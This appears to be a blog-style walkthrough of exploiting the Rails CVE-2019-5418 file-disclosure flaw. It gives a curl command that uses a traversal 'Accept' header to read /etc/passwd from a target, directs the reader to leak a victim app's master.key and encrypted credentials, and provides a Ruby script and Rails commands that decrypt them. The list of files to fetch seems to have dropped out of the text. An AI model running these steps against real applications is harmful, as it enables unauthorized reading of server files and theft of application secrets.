Expose & Decrypt Ruby on Rails credentials.yml.enc

Ruby on Rails is vulnerable to critical information disclosure using the “Accept” header technique (CVE-2019-5418). This can leak the rails app's secret credentials via directory traversal.

Expose master key and encrypted credentials

First find a path in the Rails app that uses the render file method. Typically a 404 page implements this to render the view. Read more about the root cause of this vulnerability from chybeta.

Using Burp Suite Repeater or curl request, test vulnerabilty by setting header value to Accept: ../../../../../../etc/passwd{{.

For example:

curl -H 'Accept: ../../../../../../etc/passwd{{' http://vulnerable-site.com/vulnerable-page

If that works, expose the contents of following files:

If copying and pasting the output of these from terminal stdout or Burp, make sure any unintended whitespace byte is stripped out of the saved file. Otherwise decryption will be corrupted.

Vim by default adds a newline (\n) byte at end-of-file. To avoid this, run these commands within vim:

:set binary
:set noeol
:wq

Alternatively, if making the HTTP request with curl, use the -o <save as filename> flag to save response bytes directly to a file.

Decrypt the credentials

You have two options to decrypt: write a simple ruby script by patching together snippets from Ruby on Rails source code, or use your own local rails instance to run credentials:edit on these victim files.

Example ruby script to decrypt credentials.yml.enc using master.key:

require "base64"
require "openssl"
require "json"

@cipher = 'aes-128-gcm'
credentials = File.read("credentials.yml.enc")
@key = [File.read("master.key")].pack("H*")
puts @key.length

def new_cipher
  OpenSSL::Cipher.new(@cipher)
end

def decrypt(value)
  cipher = new_cipher
  encrypted_data, iv, auth_tag = value.split("--".freeze).map { |v| ::Base64.strict_decode64(v) }

  cipher.decrypt
  cipher.key = @key
  cipher.iv  = iv
  cipher.auth_tag = auth_tag
  cipher.auth_data = ""

  decrypted_data = cipher.update(encrypted_data)
  decrypted_data << cipher.final
  return decrypted_data
end

decrypted = decrypt(credentials)
puts decrypted

To decrypt with rails’ built-in credentials:edit command, first setup the environment. Use rvm to install ruby 2.5.1 and gem install rails -v 5.2.2. Then run rails new <tmp project name> to initialize a temporary instance of a rails app. Then copy over victim credentials.yml.enc and master.key into the `./config’ folder of the app, overwriting what's been initialized by default. Finally, this built-in rails command should automatically decrypt and output the contents of the credentials file for you:

EDITOR="vim" bin/rails credentials:edit